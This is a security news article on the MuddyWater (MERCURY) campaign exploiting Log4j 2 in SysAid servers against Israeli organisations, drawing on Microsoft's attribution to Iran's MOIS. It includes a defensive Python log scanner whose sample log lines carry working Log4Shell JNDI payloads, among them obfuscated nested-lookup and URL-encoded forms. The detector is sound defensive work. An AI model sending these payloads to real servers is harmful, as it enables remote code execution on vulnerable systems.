
Iran Based MuddyWater Attacks Israel Companies


What is MuddyWater?

An Iranian threat actor known as "MuddyWater" (tracked by Microsoft as MERCURY) has been exploiting Log4j 2 vulnerabilities in SysAid applications to attack organizations in Israel. 

Microsoft security researchers published an advisory on Thursday stating that they assess with high confidence that MERCURY's observed operations are affiliated with Iran's Ministry of Intelligence and Security (MOIS). 

On July 23 and 25, 2022, MERCURY was observed using exploits against a vulnerable SysAid Server as its initial access vector. Based on observations from earlier campaigns and the vulnerabilities found in victim environments, the researchers assess that the exploits used were most likely related to Log4j 2. 

Microsoft links attack to Iranian Hackers

Microsoft said it assesses with moderate confidence that MERCURY exploited remote code execution vulnerabilities in Apache Log4j 2 (also referred to as "Log4Shell") in vulnerable SysAid Server instances run by the targets. MERCURY has used Log4j 2 exploits in past campaigns as well. 
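Because the initial access vector described here is a Log4Shell-style lookup injected into a request that reaches SysAid's Log4j 2 logging, one practical check is to search web-server or reverse-proxy access logs for JNDI lookup strings, including the obfuscated and URL-encoded forms attackers use to slip past naive string matching. The Python below is an added example written for this post; it is not Microsoft's, SysAid's, or the attacker's code. The access-log lines and the 203.0.113.0/24 addresses are constructed for illustration, and the script assumes logs in the common Apache combined format. It goes beyond the plain `${jndi:...}` string to cover the nested-lookup tricks (`${lower:j}`, `${::-j}`) and double URL-encoding that have been seen in real Log4Shell traffic.

```python
"""Scan access-log lines for Log4Shell-style JNDI lookups (added example, not vendor code)."""
import re
from urllib.parse import unquote

# Log4j 2 resolves ${...} lookups while formatting a log message. The dangerous one is
# ${jndi:<scheme>://host/...}; attackers hide the literal "jndi" behind nested lookups
# such as ${lower:j}ndi or ${::-j}ndi, and URL-encode the whole thing once or twice.
LOOKUP_CASE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
LOOKUP_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${name:-default} -> default
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^}\s]+)", re.IGNORECASE
)
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")  # any remaining lookup is still worth a look


def _apply_case(m):
    # Mimic what Log4j would do with ${lower:X} / ${upper:X}
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalise(text, max_rounds=10):
    """URL-decode and collapse innermost lookups until nothing changes, so that
    ${${lower:j}ndi:ldap://x} and %2524%257B... both end up as ${jndi:ldap://x}."""
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = LOOKUP_CASE.sub(_apply_case, text)
        text = LOOKUP_DEFAULT.sub(lambda m: m.group(1), text)
        if text == prev:
            break
    return text


def detect(line):
    """Return a finding dict for a suspicious line, or None for a clean one."""
    text = normalise(line)
    m = JNDI_LOOKUP.search(text)
    if m:
        return {"severity": "high", "scheme": m.group(1).lower(), "target": m.group(2)}
    if ANY_LOOKUP.search(text):
        # Non-JNDI lookups (${env:...}, ${sys:...}, ${math:...}) are not RCE on their own
        # but are almost never legitimate in client-supplied fields.
        return {"severity": "low", "scheme": None, "target": None}
    return None


def scan(lines):
    """Return [(line_no, severity, scheme, target)] for every line carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            hits.append((n, hit["severity"], hit["scheme"], hit["target"]))
    return hits


# Constructed sample log (Apache combined format); hosts are from the TEST-NET range.
SAMPLE_LOG = [
    '203.0.113.10 - - [23/Jul/2022:10:14:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [23/Jul/2022:10:14:07 +0000] "GET / HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://203.0.113.50:1389/a}"',
    '203.0.113.12 - - [23/Jul/2022:10:15:22 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap'
    '%3A%2F%2F203.0.113.50%3A1389%2Fb%7D HTTP/1.1" 200 1024 "-" "curl/7.79"',
    '203.0.113.13 - - [23/Jul/2022:10:16:40 +0000] "POST /api HTTP/1.1" 200 300 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.50:1099/c}"',
    '203.0.113.14 - - [23/Jul/2022:10:17:00 +0000] "GET /price?x=${math:1+1} HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for n, sev, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: {sev} {scheme or ''} {target or ''}")
```

The scan flags the plain payload in the User-Agent, the URL-encoded nested-lookup payload in the query string, and the `${::-j}`-style split payload in the POST line as high severity, and the `${math:...}` lookup as low severity; the ordinary login request is ignored. Pointing it at the web tier in front of SysAid (or any other Java application) is only a first pass: it shows who tried, not who succeeded, so every `target` host it extracts should also be checked against outbound LDAP/RMI connection logs from the application server.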

MSTIC assesses with high confidence that MERCURY is coordinating its operations in affiliation with Iran’s Ministry of Intelligence and Security (MOIS). According to the US Cyber Command, MuddyWater, a group we track as MERCURY, “is a subordinate element within the Iranian Ministry of Intelligence and Security.”

The new campaign found by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Research Team differs from earlier MERCURY activity in that it is the only one so far in which the group has been observed exploiting SysAid applications as an initial access vector. 

How does Mercury work?

Once MERCURY has gained access, it establishes persistence, dumps credentials, and moves laterally within the victim organization using both custom and widely available hacking tools as well as built-in operating system tools for its hands-on-keyboard attacks. 

Microsoft also listed common techniques and tooling used by MERCURY, including spearphishing, the Venom proxy tool, the Ligolo reverse tunneling tool, and custom PowerShell scripts. 

What next?

Microsoft confirmed that it has notified customers that were targeted or compromised, giving them the information required to secure their accounts. Microsoft has also published a list of indicators of compromise (IOCs) linked to MERCURY's activity. 

Microsoft isn't the first to link MERCURY with Iranian state actors. At the beginning of this year, both the U.K. and U.S. governments released advisories attributing the group to Iran's MOIS. 

"We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems," said Microsoft.